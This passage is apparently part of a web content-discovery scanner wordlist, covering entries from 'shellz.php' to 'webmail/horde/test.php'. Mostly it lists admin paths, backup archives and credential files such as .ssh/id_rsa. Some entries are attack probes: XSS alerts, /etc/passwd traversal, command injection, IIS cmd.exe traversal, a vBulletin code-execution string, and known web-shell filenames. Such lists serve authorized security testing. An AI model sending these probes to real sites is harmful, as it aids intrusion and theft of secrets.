shellz.php
.sh_history
shim
ship
shipped
shipping
shipping_help
shippinginfo
shipquote
shit
shockwave
shop
shop/
shopadmin
shopadmin.asp
shopadmin.asp?Password=abc&UserName="><script>alert(foo)</script>
shopa_sessionlist.asp
shop_closed
shop_content
shop/database/metacart.mdb
shopdbtest.asp
shopexd.asp?catalogid='42
shop/member_html.cgi?file=;cat%20/etc/passwd|
shop/member_html.cgi?file=|cat%20/etc/passwd|
shop/normal_html.cgi?file=;cat%20/etc/passwd|
shop/normal_html.cgi?file=|cat%20/etc/passwd|
shop/normal_html.cgi?file=../../../../../../etc/issue%00
shop/normal_html.cgi?file=&lt;script&gt;alert(\"Vulnerable\")&lt;/script&gt;
shoponline/fpdb/shop.mdb
shopper
shopper/
shop/php_files/site.config.php+
shopping
shopping300.mdb
shopping400.mdb
shopping_cart
shoppingcart
shopping/database/metacart.mdb
shopping/diag_dbtest.asp
shoppingdirectory/midicart.mdb
shopping-lists
shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>
shops
shops_buyaction
shop/search.php
shop/show.php
shop.sql
shopstat
shopsys
shoutbox
shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20
shoutbox.php?conf=../../../../../../../etc/passwd
show
showallsites
showcase
showcat
showcat.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
showcode
showcode.asp
showenv
showgroups
showjobs
showkey
showlogin
showmail.pl
showmail.pl?Folder=<script>alert(document.cookie)</script>
showmap
showmsg
show_post
showpost
showroom
shows
show_thread
showthread
.shrc
shtml
si
sid
sign
signature
signaturepics
signed
signer
signin
signing
signoff
signon
signout
sign-up
sign_up
signup
signup.action
SilverStream
SilverStream/Meta/Tables/?access-mode=text
simple
simple-backdoor.php
simplebbs/users/users.php
.simplecov
simplelogin
simpleLogin
single
single_pages
sink
sips/sipssys/users/a/admin/user
site
site/'
site_admin
siteadmin
Site/biztalkhttpreceive.dll
sitebuilder
site/common.xml
sitecore
site/eg/source.asp
sitefiles
site/iissamples/
siteimages
site-map
site_map
sitemap
SiteMap
sitemap.gz
sitemaps
sitemap.xml
sitemgr
siteminder
siteminder/smadmin.html
site.rar
sites
Sites
SiteScope
SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
SiteScope/htdocs/SiteScope.html
sitesearch
site_searcher.cgi
siteseed/
SiteServer
SiteServer/admin/
SiteServer/Admin/commerce/foundation/domain.asp
SiteServer/Admin/commerce/foundation/driver.asp
SiteServer/Admin/commerce/foundation/DSN.asp
SiteServer/admin/findvserver.asp
SiteServer/Admin/knowledge/dsmgr/default.asp
SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp
SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
SiteServer/Admin/knowledge/persmbr/vs.asp
SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp
SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp
SiteServer/Admin/knowledge/persmbr/VsTmPr.asp
SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>
SiteServer/Publishing/ViewCode.asp
siteserver/publishing/viewcode.asp?source=/default.asp
sites.ini
Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Sites/Knowledge/Membership/Inspired/ViewCode.asp
site.sql
site.sql.7z
site.sql.bz2
site.sql.gz
site.sql.rar
site.sql.tar
site.sql.tar.bz2
site.sql.tar.bzip2
site.sql.tar.gz
site.sql.tar.gzip
site.sql.tgz
site.sql.zip
Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Samples/Knowledge/Push/ViewCode.asp
Sites/Samples/Knowledge/Search/ViewCode.asp
site.tar.gz
site.txt
sk
skel
skin
skin1
skin1_original
skins
skip
sl
slabel
slapd.conf
slashdot
slides
slide_show
slideshow
slimstat
sling
.sln
sm
small
smarty
smb
smbcfg.nsf
smblogin
smconf.nsf
smency.nsf
smf
smg_Smxcfg30.exe?vcc=3560121183d3
smhelp.nsf
smile
smiles
smileys
smilies
smmsg.nsf
smquar.nsf
sms
smsolar.nsf
smssend.php
smtime.nsf
smtp
smtp.box
smtpibwq.nsf
smtp.nsf
smtpobwq.nsf
smtptbls.nsf
.smushit-status
smvlog.nsf
snippets
snoop
snp
so
soap
soap/
soapConfig.xml
soapdocs
soapdocs/ReleaseNotes.html
soapdocs/webapps/soap/
soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
SOAPMonitor
soaprouter
soapserver/
soap/servlet/soaprouter
social
soft
software
software/
Software
software.nsf
sohoadmin
soinfo.php?\"><script>alert('Vulnerable')</script>
solaris
solaris/
sold
solution
solutions
solve
solved
somebody
some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
sonar-project.properties
songs
sony
soporte
sort
sound
sounds
_source
source
source/
source.php
sources
Sources
Sources/
sox
sp
space
spacer
spain
spam
.spamassassin
spamlog.log
spanish
spaw
spaw2/dialogs/dialog.php
spaw/dialogs/dialog.php
speakers
spec
special
special_offers
specials
specified
spec/lib/database.yml
spec/lib/settings.local.yml
specs
speedtest
spellchecker
spelling.php3+
SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
sphider
spider
spiders
splash
splashAdmin.php
sponsor
sponsors
spool
sport
sports
Sports
spotlight
spryassets
spwd
spwd.db
Spy
spy.aspx
spyware
sq
.sql
sql
sql/
__SQL
_SQL
SQL
sql.7z
_sqladm
sqladm
sql-admin
sqladmin
sqlbuddy
sqlbuddy/login.php
.sql.bz2
sql.bz2
sql/db.sql
sql_dumps
sqldump.sql
sql_error.log
.sql.gz
sql.gz
sql.inc
sql/index.php
.sqlite_history
sqlmanager
sqlmanager/
sqlmigrate.php
sqlnet
sqlnet.log
sql.php
sqlqhit.asp
SQLQHit.asp
sql.rar
sql.sql
sql.sql.7z
sql.sql.bz2
sql.sql.gz
sql.sql.rar
sql.sql.tar
sql.sql.tar.bz2
sql.sql.tar.bzip2
sql.sql.tar.gz
sql.sql.tar.gzip
sql.sql.tgz
sql.sql.zip
sql.tar
sql.tar.bz2
sql.tar.bzip2
sql.tar.gz
sql.tar.gzip
sql.tgz
sql.txt
sqlweb
sqlweb/
sql.zip
squelettes
squelettes-dist
squirrel
squirrelmail
squirrelmail/src/read_body.php
sr
_src
src
src/
srchad
srchadm
src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0
srv
srvinst.nsf
srvnam.htm
srvstatus.chl+
ss
ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>
ss.cfg
ss_database_backup.sql
ssdefs/
ssdefs/siteseed.dtd
ssfm
.ssh
ssh
sshadmin
.ssh.asp
.ssh/authorized_keys
.ssh/id_rsa
.ssh/id_rsa~
.ssh/id_rsa.key
.ssh/id_rsa.key~
.ssh/id_rsa.priv
.ssh/id_rsa.priv~
.ssh/id_rsa.pub
.ssh/id_rsa.pub~
.ssh/know_hosts
.ssh/know_hosts~
.ssh/known_host
.ssh/known_hosts
sshome/
.ssh.php
ssi
ssi/
ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\
ssl
ssl_check
sslvpn
ssn
sso
ssp_director
ss_vms_admin_sm
st
stackdump
staff
staff/
staff_directory
staffs
stage
staging
stale
standalone
standard
standards
star
staradmin
start
starter
startpage
start.php?config=alper.inc.php
stat
stat/
state
statement
statements
states
stat.htm
static
staticpages
staticpages/index.php
statistic
statistic/
statistics
statistics/
Statistics
Statistics/
statistik
statmail.nsf
statrep.nsf
_stats
stats
stats/
Stats
Stats/
statshistory
stats.htm
stats.html
stats.txt
status
status/
status?full=true
statusicon
statusicon/
status.php
status.php3
STATUS.txt
status.xsl
stauths.nsf
stautht.nsf
.st_cache/
stconfig.nsf
stconf.nsf
stdnaset.nsf
stdomino.nsf
stlog.nsf
stock
stoneedge
stop
storage
store
store/
store_closed
stored
StoreDB/
stores
stories
story
stow
strategy
stream
streg.nsf
string
stronghold-info
stronghold-status
structure.sql
strut
struts
stsrc.nsf
stub-status
student
students
studio
stuff
style
style/
style_avatars
style_captcha
style_css
style_emoticons
style_images
_styles
styles
styles/
stylesheet
stylesheet/
stylesheets
stylesheets/
sub
subdomains
subir/
subject
.sublime-gulp.cache
.sublime-project
.sublime-workspace
sub-login
submenus
submissions
submit
submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview
submit?setoption=q&option=allowed_ips&value=255.255.255.255
submitter
subs
subscribe
subscribed
subscriber
subscribers
subscription
subscriptions
.subversion
success
suche
sucontact
.sucuriquarantine/
suffix
sugarcrm.log
suggest
suggest-listing
suite
suites
summary
sun
sun/
sunos
sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>
.sunw
SUNWmc
SUNWmc/htdocs/
SUNWmc/htdocs/en_US/
super
Super-Admin
super_stats/access_logs
super_stats/error_logs
supplier
support
support/
Support
support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
supported
supporter/index.php
supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
supporter/tupdate.php
support_login
support/messages
surf
surf/scwebusers
surgemail/
surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f9.swf
surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload.swf
survey
surveys
Survey/Survey.Htm
suspended.page
suupgrade
sv
svc
.svn
.svn/
svn
svn/
SVN/
svn-base
.svn/entries
.svnignore
svn.revision
svr
.sw
sw
sw000.asp?|-|0|404_Object_Not_Found
swajax1
.swf
_swf
swf
swfobject.js
swfs
swfupload
switch
.swo
.swp
sws
sxd/
sxd/backup/
symfony/apps/frontend/config/routing.yml
symfony/apps/frontend/config/settings.yml
symfony/config/databases.yml
Symlink.php
Symlink.pl
symphony/apps/frontend/config/app.yml
symphony/apps/frontend/config/databases.yml
symphony/config/app.yml
symphony/config/databases.yml
sYm.php
Sym.php
sym/root/home/
synapse
sync
synced
.SyncID
.SyncIgnore
syndication
.synthquota
~sys
sys
sys/
~sysadm
~sysadmin
sys-admin
sysadmin
SysAdmin
sysadmin2
SysAdmin2
sysadmin.php
sysadmins
sysadmins/
sysbackup
syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>
syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>
syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>
syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>
syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>
syslog/
syslog.htm?%20
sysmanager
system
system/
system-admin
system_admin
system-administration
system_administration
system/cron/cron.txt
system/error.txt
system.log
system/log/
system/logs/
systems
.system/sitemap.xml
system_web
sysuser
sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/iecreate.stm?template=../
sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/ieedit.stm?url=../
sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>
sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>
szukaj
t
T
t00.php
t1
t3lib
table
tabs
tag
tagline
.tags
tags
.tags_sorted_by_file
tail
talk
talks
tape
tapes
tapestry
.tar
tar
tar/
.tar.bz2
tar.bz2
target
.tar.gz
tar.gz
tarjetas/
tartarus
task
tasks
taxonomy
tb
tcb/files/auth/r/root
tcl
te
team
tech
technical
technico.txt
technology
Technology
technote/print.cgi
tel
tele
television
tell_a_friend
tellafriend
tell_friend
telphin.log
temaoversikt
.temp
_temp
temp
temp/
TEMP
TEMP/
_tempalbums
templ
_template
template
template/
_templates
templates
templates/
templates/beez/index.php
templates_c
templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>
templates/ja-helio-farsi/index.php
templates/rhuk_milkyway/index.php
templets
temporal
temporal/
temporary
temp.php
temps
temp.sql
temp.sql.7z
temp.sql.bz2
temp.sql.gz
temp.sql.rar
temp.sql.tar
temp.sql.tar.bz2
temp.sql.tar.bzip2
temp.sql.tar.gz
temp.sql.tar.gzip
temp.sql.tgz
temp.sql.zip
..\..\..\..\..\..\temp\temp.class
term
terminal
terms
terms-of-use
termsofuse
terms_privacy
terrorism
_test
~test
test
test/
test_
test0.php
test1
test123
test1234
test123.php
test1.php
test2
test2.php
test3
test3.php
test4.php
test5.php
test6.php
test7.php
test8.php
test9.php
test.asp
test.aspx
test-cgi
test.chm
test_db
teste
test-env
test.htm
test.html
testimonial
testimonials
test/info.php
testing
testing/
test_ip.php
test.jsp
test/jsp/buffer1.jsp
test/jsp/buffer2.jsp
test/jsp/buffer3.jsp
test/jsp/buffer4.jsp
test/jsp/declaration/IntegerOverflow.jsp
test/jsp/extends1.jsp
test/jsp/extends2.jsp
test/jsp/Language.jsp
test/jsp/pageAutoFlush.jsp
test/jsp/pageDouble.jsp
test/jsp/pageExtends.jsp
test/jsp/pageImport2.jsp
test/jsp/pageInfo.jsp
test/jsp/pageInvalid.jsp
test/jsp/pageIsErrorPage.jsp
test/jsp/pageIsThreadSafe.jsp
test/jsp/pageSession.jsp
test.mdb
test.nsf
__test.php
test.php
test.php%20
test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
test/phpinfo.php
test/realPath.jsp
tests
tests/
test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
testsite
tests/phpunit_report.xml
test.sqlite
test.txt
texis
texis.exe/?-dump
texis.exe/?-version
texis/websearch/phine
text
text-base
textobject
textpattern
texts
.tgitconfig
tgp
tgz
th
thanks
thank-you
thankyou
the
thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin
theme
theme1/selector?button=status,monitor,session&button_url=/system/status/status\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session
theme1/selector?button=status,monitor,session\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session
_themes
themes
Themes
themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>
thickbox
third-party
this
thread
threadrate
threads
threadtag
thumb
thumbnail
thumbnails
.thumbs
thumbs
thumbs.db
Thumbs.db
ticket
ticket_list
ticket_new
ticket.php?id=99999
tickets
tienda
tiki
tiki/
tiki/tiki-install.php
tiles
time
timeline
tiny_mce
tiny_mce/
tinymce
tinymce/
tiny_mce/plugins/filemanager/examples.html
tiny_mce/plugins/imagemanager/pages/im/index.html
tinymsg.php
tip
tips
title
titles
TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes
TiVoConnect?Command=QueryServer
tl
tls
.tmp
_tmp
~tmp
tmp
tmp/
TMP
tmp/2.php
tmp/access.log
tmp/access_log
tmp/admin.php
tmp/cgi.pl
tmp/Cgishell.pl
tmp/changeall.php
tmp/cpn.php
tmp/d0maine.php
tmp/domaine.php
tmp/domaine.pl
tmp/d.php
tmp/dz1.php
tmp/dz.php
tmp/error.log
tmp/error_log
_tmpfileop
tmp/index.php
tmp/killer.php
tmpl
tmp/L3b.php
tmp/madspotshell.php
tmp/priv8.php
.tmproj
tmp/root.php
tmps
tmp/sessions/
tmp/sql.php
tmp/Sym.php
tmp/upload.php
tmp/uploads.php
tmp/up.php
tmp/user.php
tmp/vaga.php
tmp_view.php?file=/etc/passwd
tmp/whmcs.php
tmp/xd.php
tn
tncms
to
toc
today
today.nsf
todel
todo
TODO
toggle
tomcat
tomcat-docs
tomcat-docs/index.html
tool
toolbar
toolkit
tools
tools/
tools/_backups/
tooltip
top
top1
topic
topicadmin
topic/entete.php
topics
toplist
toplists
topnav
topsites
TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
topsitesdir/edit.php
torrent
torrents
tos
tour
tours
.tox
toys
tp
tpl
tpv
tpv/
tr
trabajo/
trac
trace
trace.axd
Trace.axd
Trace.axd::$DATA
traceroute
traces
track
trackback
trackclick
tracker
trackers
tracking
trackpackage
tracks
trade
trademarks
traffic
trafficlog/
trailer
trailers
training
trans
transaction
transactions
transfer
transformations
.transients_purge.log
transito/
translate
translations
transparent
transport
trap
trash
.Trash
.Trashes
travel
Travel
.travis.yml
treasury
tree
tree/
trees
trees/
trends
trial
true
trunk
tslib
tst
tsweb
tsweb/
tt
ttforum/index.php
ttp://127.0.0.1:2301/
tuning
turbine
tuscany
tutorial
tutorials
tutos/file/file_new.php
tutos/file/file_select.php
tv
tvcs/getservers.exe?action=selects1
tw
twatch
tweak
twiki
twitter
.tx/
tx
txt
type
typo3
typo3conf
typo3conf/
typo3conf/database.sql
typo3conf/localconf.php
typo3/phpmyadmin/
typo3/phpmyadmin/scripts/setup.php
typo3_src
typo3temp
typo3/typo3/dev/translations.php
typolight
u
U
ua
ubb
uber/phpMemcachedAdmin/
uber/phpMyAdmin/
uber/phpMyAdminBackup/
uc
uc_client
ucenter
ucp
uc_server
uddi
uds
ui
uifc/MultFileUploadHandler.php+
ui/vault/
uk
umbraco
umbraco_client
umts
unattend.txt
uncategorized
under_update
uninstall
union
unix
unlock
unpaid
unreg
unregister
unsafe
unsubscribe
unused
up
upcoming
upd
upd/
update
updated
updateinstaller
updater
updates
updates/
updates-topic
UPDATE.txt
upgrade
UPGRADE
upgrade.php
upgrade.readme
UPGRADE.txt
upload
upload/
Upload
upload/1.php
upload2.php
uploadarticles/uploadTester.asp
upload.asp
upload.aspx
upload/b_user.csv
upload/b_user.xls
upload.cfm
upload.cgi+
uploaded
uploadedfiles
uploadedimages
uploader
uploader/
uploader.php
upload_file
uploadfile
upload_file.php
uploadfile.php
upload_files
uploadfiles
uploadfiles.php
upload.htm
upload.html
uploadify/
uploadify.php
uploadify/uploadify.swf
uploadn.asp
upload.php
upload.php3
upload.php?type=\"<script>alert(document.cookie)</script>
uploads
uploads/
upload.shtm
uploads.php
upload.sql
upload.sql.7z
upload.sql.bz2
upload.sql.gz
upload.sql.rar
upload.sql.tar
upload.sql.tar.bz2
upload.sql.tar.bzip2
upload.sql.tar.gz
upload.sql.tar.gzip
upload.sql.tgz
upload.sql.zip
upload/test.php
upload/test.txt
upload/upload.php
uploadx.asp
upl.php
up.php
upstream_conf
ur-admin
ur-admin.php
urchin
url
url.jsp
urlrewriter
urls
us
US
usa
usage
usage/
us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
~user
user
user/
useraction.php3
useradmin
useradmin/
userapp
USER/CONFIG.AP
usercontrols
usercp
usercp2
usercp2.php
usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
userdir
UserFile
userfiles
UserFiles
user_guide
userimages
userinfo
userinfo.php?uid=1;
.user.ini
userlist
userlog
userlogin
userlog.php
usermanager
username
usernames
usernames.txt
usernote
user.php
user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&[email protected]
user.php?op=userinfo&uname=<script>alert('hi');</script>
userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd
userreg.nsf
users
users/
users.7z
users.bz2
users.csv
users.db
users.gz
users.ini
users.log
users.lst
users.mdb
users.nsf
users.php
users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
users.rar
users/scripts/submit.cgi
users.sql
users.sql.7z
users.sql.bz2
users.sql.gz
users.sqlite
users.sql.rar
users.sql.tar
users.sql.tar.bz2
users.sql.tar.bzip2
users.sql.tar.gz
users.sql.tar.gzip
users.sql.tgz
users.sql.zip
users.tar
users.tar.bz2
users.tar.bzip2
users.tar.gz
users.tar.gzip
users.tgz
users.txt
users.xls
users.zip
user.txt
user_upload
user_uploads
usr
usrmgr
usrs
ustats
ustats/
usuario
usuario/
usuarios
usuarios/
util
utilities
Utilities
utility
utility_login
utils
utils/sprc.asp
utils/sprc.asp+
v
V
v1
v2
v3
v4
.vacation.cache
vadmind
.vagrant
Vagrantfile
vagrant-spec.config.rb
validation
validatior
validator.php
vap
var
var/backups/
var/debug.log
var/log/
var/logs/
vars.inc+
vault
vb
vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vbmodcp
vb.rar
vbs
vbscript
vbscripts
vbseo
vbseocp
vb.sql
vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vb.zip
VBZooM/add-subject.php
vc30/
vchat/msg.txt
vcss
vdsbackup
vector
vehicle
vehiclemakeoffer
vehiclequote
vehicletestdrive
velocity
venda
vendor
vendors
ver
ver1
ver2
.version
version
VERSION.txt
verwaltung
vfs
vfs/
.vgextensions/
vgn/ac/data
vgn/ac/delete
vgn/ac/edit
vgn/ac/esave
vgn/ac/fsave
vgn/ac/index
vgn/asp/MetaDataUpdate
vgn/asp/previewer
vgn/asp/status
vgn/asp/style
vgn/errors
vgn/jsp/controller
vgn/jsp/errorpage
vgn/jsp/initialize
vgn/jsp/jspstatus
vgn/jsp/jspstatus56
vgn/jsp/metadataupdate
vgn/jsp/previewer
vgn/jsp/style
vgn/legacy/edit
vgn/legacy/save
vgn/license
vgn/login
vgn/login/1,501,,00.html?cookieName=x--\>
vgn/performance/TMT
vgn/performance/TMT/Report
vgn/performance/TMT/Report/XML
vgn/performance/TMT/reset
vgn/ppstats
vgn/previewer
vgn/record/previewer
vgn/style
vgn/stylepreviewer
vgn/vr/Deleting
vgn/vr/Editing
vgn/vr/Saving
vgn/vr/Select
vi
viagra
vid
video
Video
videos
vider.php3
view
view_cart
viewcart
viewcvs
viewer
viewfile
viewforum
viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1
viewlogin
viewonline
viewpage.php?file=/etc/passwd
view.php
views
view-source
viewsource
view_source.jsp
viewsvn
viewthread
viewtopic
viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
viewvc
.viminfo
.vimrc
vip
virtual
virus
visit
visitor
visitormessage
vista
vm
vmailadmin
void
voip
vol
volunteer
vote
voted
voter
votes
vp
vpg
vpn
vpuserinfo.nsf
vs
vsadmin
_vti_aut
_vti_bin
_vti_bin/
_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
_vti_bin/admin.pl
_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
_vti_bin/cfgwiz.exe
_vti_bin/CGImail.exe
_vti_bin/contents.htm
_vti_bin/fpadmin.htm
_vti_bin/fpcount.exe
_vti_bin/fpcount.exe/
_vti_bin/fpremadm.exe
_vti_bin/fpsrvadm.exe
_vti_bin/shtml.dll
_vti_bin/shtml.dll/_vti_rpc
_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
_vti_bin/shtml.exe
_vti_bin/shtml.exe/junk_nonexistant.exe
_vti_bin/shtml.exe/_vti_rpc
_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
_vti_bin/_vti_adm/admin.dll
_vti_bin/_vti_aut/author.dll
_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
_vti_bin/_vti_aut/dvwssr.dll
_vti_bin/_vti_aut/fp30reg.dll
_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
_vti_bin/_vti_cnf/
_vti_cnf
_vti_cnf/_vti_cnf/
_vti_inf
_vti_inf.html
_vti_log
_vti_log/_vti_cnf/
_vti_map
_vti_pvt
_vti_pvt/access.cnf
_vti_pvt/administrators.pwd
_vti_pvt/authors.pwd
_vti_pvt/botinfs.cnf
_vti_pvt/bots.cnf
_vti_pvt/deptodoc.btr
_vti_pvt/doctodep.btr
_vti_pvt/linkinfo.cnf
_vti_pvt/service.cnf
_vti_pvt/service.pwd
_vti_pvt/services.cnf
_vti_pvt/services.org
_vti_pvt/svacl.cnf
_vti_pvt/users.pwd
_vti_pvt/writeto.cnf
_vti_rpc
_vti_script
_vti_txt
_vti_txt/
_vti_txt/_vti_cnf/
vtund.conf
vuln
vvc_display
w
W
w3
w3c
w3perl/admin
w3svc
W3SVC
W3SVC1
W3SVC2
W3SVC3
wa
wa.exe
w-agora/
wallpaper
wallpapers
wap
war
warenkorb
warez
warez/
warn
way-board
wbboard
wbboard/profile.php
wbboard/reply.php
wbsadmin
wc
wcs
wcx_ftp.ini
wdav
weather
.web
web
web/
web1
web2
web3
web800fo/
webaccess
webaccess/access-options.txt
webaccess.htm
webacula/application/config.ini
webadm
webadmin
webadmin/
WebAdmin
WebAdmin.dll?View=Logon
webadmin.html
webadmin.nsf
webadmin.php
webagent
WEBAGENT/CQMGSERV/CF-SINFO.TPF
webalizer
webalizer/
webamil/test.php
webamil/test.php?mode=phpinfo
webapp
webapp/admin/_pages/_bc4jadmin/
webapps
web_app/WEB-INF/webapp.properties
webb
webbbs
web-beans
webboard
webboard/
webcache/
WebCacheDemo.html
webcache/webcache.xml
webcalendar
webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>
webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd
webcalendar/login.php
webcalendar/view_m.php
webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>
webcalendar/week.php?user=\"><script>alert(document.cookie)</script>
webcam
webcart
webcart/
webcart/carts/
webcart/config/
webcart/config/clients.txt
webcart-lite/
webcart-lite/config/import.txt
webcart-lite/orders/import.txt
webcart/orders/
webcart/orders/import.txt
webcast
webcasts
webcgi
webcharts
webchat
webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
web.config
web.config::$DATA
web.config.bak
web.config.bakup
web.config.old
web.config.temp
web.config.tmp
web.config.txt
web-console
web-console/
web-console/Invoker
web-console/ServerInfo.jsp
web-console/ServerInfo.jsp%00
webctrl_client
webdata
webdata/
webdav
webdav/
webdav/index.html
webdav/servlet/webdav/
webdb
webdb/
web.Debug.config
Web.Debug.config
webdist
webedit
webfm_send
webgrind
webhits
webim
webinar
web-inf
_WEB_INF/
WEB-INF
WEB-INF/config.xml
WEB-INF./web.xml
WEB-INF/web.xml
weblog
weblog/
weblogic
weblogs
weblogs/
webmail
webmail/
webmail/blank.html
webmail/horde/test.php
